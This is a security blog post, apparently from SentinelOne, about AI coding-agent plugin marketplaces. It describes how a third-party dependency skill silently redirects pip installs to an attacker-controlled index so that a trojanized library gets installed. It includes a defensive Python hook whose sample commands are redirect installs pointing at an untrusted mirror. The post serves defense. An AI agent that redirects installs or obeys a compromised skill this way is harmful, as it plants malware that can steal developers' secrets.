AI coding assistants are no longer just autocompleting lines of code; they are quietly making decisions for you. Tools like Claude Code are able to read projects, plan multi-step changes, install dependencies, and modify files with minimal human oversight. To make this possible, these assistants rely on plugin marketplaces, where third-party developers can publish ‘skills’ that teach the agent how to manage infrastructure, testing, and dependencies. Though powerful, this model requires a high degree of trust and therefore brings with it a new set of risks.
At first glance, third-party marketplace plugins look like harmless productivity boosters: connect a marketplace, enable a plugin, and your coding assistant becomes smarter about your stack. Beneath the convenience, however, is a security blind spot. These skills often run with extremely high privilege and with very little transparency about how they make decisions or where the code and dependencies they pull in are coming from. The core issue isn’t prompt manipulation or social engineering – it’s compromised automation.
A full technical blog post by SentinelOne’s own Prompt Security team breaks down how a single benign-looking plugin from an unofficial marketplace exposes a dependency management skill. When the developer asks the agent to install a common Python library, that skill quietly redirects the install to an attacker-controlled source, ensuring a trojanized version of the library is pulled into the project. While nothing looks wrong – the library imports cleanly, the example code runs without error – malicious code is now embedded into the environment, capable of exfiltrating secrets, monitoring traffic, or lying dormant until it is triggered at a later time.
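The redirect described above is visible at exactly one point: the install command the agent is about to run. The following is an added defensive example (not SentinelOne's, Prompt Security's, or the plugin's code) showing how a pre-execution hook or wrapper could audit a proposed `pip install` for index redirection. It assumes the hook can see the shell command string and the process environment, and that the organization maintains an allowlist of package-index hosts; the allowlist entries, hostnames, and sample commands are all constructed for the example.

```python
"""Audit an agent-proposed shell command for package-index redirection.

Added example, not code from the original post or from any vendor. It assumes
a hook that sees the command a coding agent is about to execute and an
organizational allowlist of package-index hosts (both constructed here).
"""
import os
import shlex
from urllib.parse import urlparse

# Constructed allowlist: the only hosts that may serve Python packages.
ALLOWED_INDEX_HOSTS = {"pypi.org", "files.pythonhosted.org", "pypi.internal.example"}

# pip options that change where packages are fetched from.
INDEX_FLAGS = {"-i", "--index-url", "--extra-index-url", "-f", "--find-links"}
# Environment variables pip honours for the same purpose.
ENV_INDEX_VARS = ("PIP_INDEX_URL", "PIP_EXTRA_INDEX_URL", "PIP_FIND_LINKS")


def _host(url):
    """Lower-cased hostname of a URL, or '' if it has none."""
    return (urlparse(url).hostname or "").lower()


def _is_pip_invocation(argv):
    """True for `pip ...`, `pip3 ...`, `/path/to/pip ...` and `python -m pip ...`."""
    for idx, tok in enumerate(argv):
        if os.path.basename(tok) in ("pip", "pip3"):
            return True
        if tok == "-m" and idx + 1 < len(argv) and argv[idx + 1] == "pip":
            return True
    return False


def audit_pip_command(command, env=None):
    """Return a list of (severity, message) findings for one shell command.

    Non-pip commands and fully allowlisted, hash-pinned installs yield [].
    """
    env = env or {}
    findings = []
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return [("error", f"could not parse command: {exc}")]
    if not _is_pip_invocation(argv) or "install" not in argv:
        return findings

    # Inline overrides such as `PIP_INDEX_URL=https://... pip install pkg`.
    for tok in argv:
        name, sep, value = tok.partition("=")
        if sep and name in ENV_INDEX_VARS and _host(value) not in ALLOWED_INDEX_HOSTS:
            findings.append(("high", f"{name} points at non-allowlisted host {_host(value)!r}"))
    # Overrides already present in the process environment (command line looks clean).
    for name in ENV_INDEX_VARS:
        value = env.get(name)
        if value and _host(value) not in ALLOWED_INDEX_HOSTS:
            findings.append(("high", f"environment {name} points at non-allowlisted host {_host(value)!r}"))

    # Flag overrides: `--index-url URL`, `--index-url=URL`, `-i URL`, `--find-links URL`.
    i = 0
    while i < len(argv):
        flag, sep, inline_value = argv[i].partition("=")
        if flag in INDEX_FLAGS:
            value = inline_value if sep else (argv[i + 1] if i + 1 < len(argv) else "")
            host = _host(value)
            if host not in ALLOWED_INDEX_HOSTS:
                findings.append(("high", f"{flag} redirects installs to non-allowlisted host {host!r}"))
            if not sep:
                i += 1  # skip the separate value token
        elif flag == "--trusted-host":
            findings.append(("medium", "--trusted-host disables TLS verification for an index"))
            if not sep:
                i += 1
        i += 1

    # Without --require-hashes a substituted artifact would install silently.
    if "--require-hashes" not in argv:
        findings.append(("low", "install is not hash-pinned (--require-hashes absent)"))
    return findings


def should_block(command, env=None):
    """Policy decision for the hook: block on any high-severity finding."""
    return any(sev == "high" for sev, _ in audit_pip_command(command, env))


if __name__ == "__main__":
    # Constructed sample commands a dependency skill might propose.
    samples = [
        "pip install requests",
        "pip install --index-url https://untrusted-mirror.example/simple requests",
        "PIP_INDEX_URL=https://untrusted-mirror.example/simple python -m pip install requests",
        "pip install --extra-index-url=https://pypi.internal.example/simple --require-hashes -r requirements.txt",
    ]
    for cmd in samples:
        print("BLOCK" if should_block(cmd) else "allow", cmd, audit_pip_command(cmd))
```

The check deliberately looks at both the command line and the environment, because a skill that sets `PIP_INDEX_URL` in the agent's shell would pass a command-line-only filter. Treat it as one layer: the same allowlist should also be enforced in `pip.conf` and at the egress proxy, so a redirect that bypasses the hook still fails to reach an unapproved host.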
What makes this especially concerning is persistence. Marketplace plugins are not one-off interactions. Once enabled, their skills remain available across sessions and will continue to shape how the agent behaves in the future. Rather than a ‘bad prompt’, this effect is more like compromising your package manager itself.
As AI-driven development workflows accelerate, plugin marketplaces and third-party skills are now part of the software supply chain whether teams realize it or not. If your coding assistant can fetch and execute code on your behalf, every plugin installed joins your trust boundary.
Read the full blog post here for a detailed walkthrough of the attack mechanics and learn why dependency skills are such a powerful, but under-modeled, risk.
Third-Party Trademark Disclaimer:
All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.